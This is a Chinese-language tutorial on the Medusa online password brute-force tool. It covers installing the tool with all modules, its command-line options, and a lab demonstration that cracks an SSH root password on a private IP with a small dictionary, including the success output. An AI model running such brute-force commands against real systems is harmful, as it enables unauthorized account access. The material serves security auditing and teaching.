目录
前言
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。
安装配置
1)了解它的一些功能
官网:http://foofus.net/goons/jmk/medusa/medusa.html
2)去官网下载tar包
3)上传包并解压安装
[root@bogon ~]# yum install lrzsz -y
[root@bogon ~]# yum -y install gcc gcc-c++ openssl-devel libssh2-devel postgresql-devel subversion-devel freerdp-devel #安装苏需要的依赖官网有说明
[root@bogon ~]# cd medusa-2.2
[root@bogon ~]# ./configure --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes #加入它的部分模块
[root@bogon ~]# make -j 4
[root@bogon ~]# make install #安装
[root@bogon ~]# ls /usr/local/lib/medusa/modules #查看可用的模块
4)美杜莎的参数说明
Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]
-h [TEXT] 目标主机名称或者IP地址
-H [FILE] 包含目标主机名称或者IP地址文件
-u [TEXT] 测试的用户名
-U [FILE] 包含测试的用户名文件
-p [TEXT] 测试的密码
-P [FILE] 包含测试的密码文件
-C [FILE] 组合条目文件
-O [FILE] 日志信息文件
-e [n/s/ns] n代表空密码,s代表为密码与用户名相同
-M [TEXT] 模块执行名称
-m [TEXT] 传递参数到模块
-d 显示所有的模块名称
-n [NUM] 使用非默认Tcp端口
-s 启用SSL
-r [NUM] 重试间隔时间,默认为3秒
-t [NUM] 设定线程数量
-T 同时测试的主机总数
-L 并行化,每个用户使用一个线程
-f 在任何主机上找到第一个账号/密码后,停止破解
-F 在任何主机上找到第一个有效的用户名/密码后停止审计。
-q 显示模块的使用信息
-v [NUM] 详细级别(0-6)
-w [NUM] 错误调试级别(0-10)
-V 显示版本
-Z [TEXT] 继续扫描上一次
模拟使用
1)创建我们的字典,里面可以存放任何密码
[root@bogon ~]# vi /root/zd.txt
123456789
12345
123456ada
123456
fsfsgs
2)演示(这里我演示单一ip)
[root@bogon ~]# medusa -M ssh -h 192.168.191.129 -u root -P /root/zd.txt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456789 (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (2 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456ada (3 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (4 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.191.129 User: root Password: 123456 [SUCCESS]
总结
可以从我的演示中看出,只要密码库够全,密码被分析出来的几率就会很大,无非就是时间的问题。